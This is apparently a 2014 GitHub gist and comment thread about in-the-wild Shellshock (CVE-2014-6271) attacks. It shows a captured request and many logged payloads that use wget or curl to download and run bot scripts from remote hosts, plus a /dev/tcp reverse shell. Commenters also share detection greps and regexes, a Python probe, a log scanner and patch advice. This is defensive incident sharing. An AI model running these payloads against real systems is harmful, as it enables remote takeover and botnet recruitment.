```
GET / HTTP/1.0
User-Agent: Thanks-Rob
Cookie: () { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
Accept: */*
```

```
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a  nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489  nginx
```
Looking at the strings in the binary, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys |
GelosSnake
commented
Sep 25, 2014
shit, good work
IvRRimum
commented
Sep 25, 2014
ssilaev
commented
Sep 25, 2014
omg
w-flo
commented
Sep 25, 2014
This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!".
absynth
commented
Sep 25, 2014
Seems to connect to 108.162.197.26 which is a cloudflare IP.
horacio
commented
Sep 25, 2014
Holy bejesus.
denartha
commented
Sep 25, 2014
Curl would be better. It comes natively in nearly everything, wget does not.
unixfreaxjp
commented
Sep 25, 2014
Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
buren-trialbee
commented
Sep 25, 2014
poggs
commented
Sep 25, 2014
Nice - the following text strings are in the binary: root
mneimsky
commented
Sep 25, 2014
denartha you should send a note to the author.
itiki
commented
Sep 25, 2014
OMG
rfc1459
commented
Sep 25, 2014
If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on)
Jamyn
commented
Sep 25, 2014
This should be interesting.
zhangran
commented
Sep 25, 2014
Awesome~~~
unsignedzero
commented
Sep 25, 2014
Rob a hero!
ABISprotocol
commented
Sep 25, 2014
Thanks Yinette and Rob, et al. This is done from your terminal. Mac / OSX: Debian / Ubuntu: `sudo apt-get update && sudo apt-get upgrade` Fedora / CentOS: You may want to read this thing first, maybe PREPAAAAAARRRRE
ahollandECS
commented
Sep 25, 2014
Just saw this user-agent in the wild as well:
muloka
commented
Sep 25, 2014
@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851
bmurch
commented
Sep 25, 2014
Looks like someone is gathering a list:
```
grep '() { :;}' *
access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
```
wilkinson
commented
Sep 25, 2014
I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!
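An added example of such a check, written for this page and not taken from wilkinson's gist: it runs the widely published CVE-2014-6271 probe (a function definition exported through the environment with a command trailing the closing brace) against the local bash and reports whether the trailing command ran. The variable name `SHELLSHOCK_PROBE`, the marker string and the `describe()` wrapper are this example's own choices.

```python
import os
import shutil
import subprocess

# Name and marker are this example's own choices; any environment variable
# name would do, since an unpatched bash inspects every variable's value.
PROBE_VAR = "SHELLSHOCK_PROBE"
MARKER = "SHELLSHOCK_MARKER_RAN"


def bash_is_vulnerable(bash_path=None):
    """Probe a bash binary for CVE-2014-6271.

    Exports a variable whose value is a function definition followed by a
    trailing command, then starts bash with an unrelated command. A bash that
    still executes the trailing text while importing the function prints the
    marker; a patched bash treats the variable as an ordinary string.

    Returns True (vulnerable), False (not vulnerable) or None (no bash found
    or it could not be run).
    """
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ)
    env[PROBE_VAR] = "() { :;}; echo " + MARKER
    try:
        proc = subprocess.run(
            [bash, "-c", "echo probe-done"],
            env=env, capture_output=True, text=True, timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    return MARKER in proc.stdout


def describe(bash_path=None):
    """Human-readable verdict, suitable for a login banner or a .bashrc line."""
    result = bash_is_vulnerable(bash_path)
    if result is None:
        return "bash not found or not runnable"
    return "VULNERABLE to CVE-2014-6271" if result else "not vulnerable to CVE-2014-6271"


if __name__ == "__main__":
    print(describe())
```

Run it on each host you administer; a patched bash prints "not vulnerable to CVE-2014-6271". The probe covers only the original CVE-2014-6271 parsing flaw, not the follow-up issues fixed by later bash patches.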
4dd3r
commented
Sep 25, 2014
rdev5
commented
Sep 25, 2014
Caught one passing in as User Agent string at 14:34. Reason: User header "HTTP_USER_AGENT" contains "() { :;}" IP Address: 93.103.21.231
nicheath
commented
Sep 25, 2014
209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.
Colbert337
commented
Sep 26, 2014
wow, cool! THX!
nate-kingsley
commented
Sep 26, 2014
Found another: 80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""
chridd
commented
Sep 26, 2014
bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.
heyflynn
commented
Sep 26, 2014
109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur"" -- this one showed up a couple of times on our servers today from the Netherlands. The source it pulls from, http://213.5.67.223/jur, has what looks to be a botnet with a worm component. Edit - looks like 213.5.67.223 removed the exposed file. I have a copy of it; is there anyone in the security community I can send it to? There is some pretty scary looking shit in it. Damn perl script has a built-in port scanner, botnet tcp/udp flooders and spreader.
realfx
commented
Sep 26, 2014
Does it work on Android?
rdev5
commented
Sep 26, 2014
Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix? On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to
ABISprotocol
commented
Sep 26, 2014
Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/
bacbos
commented
Sep 26, 2014
Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""`
UAHR
commented
Sep 26, 2014
198.101.206.138 also here: ...and this one:
Cherrytreee
commented
Sep 26, 2014
A n00b question here:
ChrisMCMine
commented
Sep 26, 2014
@Cherrytreee do you have cgi scripts? If not then you're safe atm.
Cherrytreee
commented
Sep 26, 2014
@ChrisMCMine I don't. Thx!
rdev5
commented
Sep 26, 2014
More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.
ingie
commented
Sep 26, 2014
@UAHR
Neo23x0
commented
Sep 27, 2014
I created a regex that matches the different attacks. (egrep compatible v4) ()\s{.;\s}\s*; Examples:
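Following on from bmurch's grep, chridd's point that the body between the braces need not be `:;`, and Neo23x0's regex (whose metacharacters look to have been eaten by the comment renderer), here is an added example, not code from anyone in this thread, that scans Apache combined-format log lines for the exported-function prefix and reports which field carried it and the command that trailed it. The sample lines are constructed (modelled on those posted above, with documentation-range addresses), the regex is my own rather than Neo23x0's, and the referer/user-agent split assumes the referer contains no embedded quotes.

```python
import re

# Constructed sample lines in Apache combined log format, modelled on the
# requests posted in this thread; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"',
    '192.0.2.11 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 203.0.113.5/r.txt -O /tmp/klogd""',
    '192.0.2.12 - - [25/Sep/2014:00:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "http://example.com/" "Mozilla/5.0"',
    '192.0.2.13 - - [26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "() { ignored; }; /usr/bin/id" "curl/7.30"',
]

# The prefix bash recognises is "() {"; the body between the braces is
# arbitrary (it need not be ":;"), so anything up to the closing brace is
# accepted, followed by ";" and the injected command.
PAYLOAD = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<command>.*)")

# Fixed-position fields up to the response size; referer and user-agent stay
# in `rest` because an injected user-agent usually contains embedded quotes.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<rest>.*)$'
)


def _split_rest(rest):
    """Split '"<referer>" "<user-agent>"'; assumes the referer has no quotes."""
    m = re.match(r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$', rest)
    if m is None:
        return "", rest.strip('"')
    return m.group("referer"), m.group("ua")


def scan_line(line):
    """Return a finding for a line carrying an exported-function payload, else None."""
    m = LINE.match(line)
    if m is None:
        return None
    referer, ua = _split_rest(m.group("rest"))
    for field, text in (("request-line", m.group("request")),
                        ("referer", referer),
                        ("user-agent", ua)):
        hit = PAYLOAD.search(text)
        if hit:
            return {
                "ip": m.group("ip"),
                "time": m.group("time"),
                "field": field,
                "command": hit.group("command").strip(),
            }
    return None


def scan_log(lines):
    """Findings for every matching line, in log order."""
    return [f for f in map(scan_line, lines) if f is not None]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<12} {f['field']:<12} {f['command']}")
```

Feed it `open("access_log")` instead of `SAMPLE_LOG` to triage a real log; the extracted command is what you hand to whoever pulls the dropped files for analysis. Headers such as Cookie and Host, which the gist above shows being abused too, do not appear in the default combined format, so a web server that only logs that format will not show those vectors here.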
ghost
commented
Sep 28, 2014
just discovered a new one in our server logs.. X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""
behindthefirewalls
commented
Sep 29, 2014
"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"
addbook
commented
Sep 29, 2014
Damn
blues-man
commented
Sep 29, 2014
Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
ghost
commented
Sep 30, 2014
and another one bites the dust.. 62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"
Vic020
commented
Oct 1, 2014
Great,
clontarfx
commented
Oct 2, 2014
86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"" Seems fairly straight-forward.
tarzand
commented
Oct 27, 2014
omg
aaronkaplan
commented
Sep 25, 2014
oh wow... thx Rob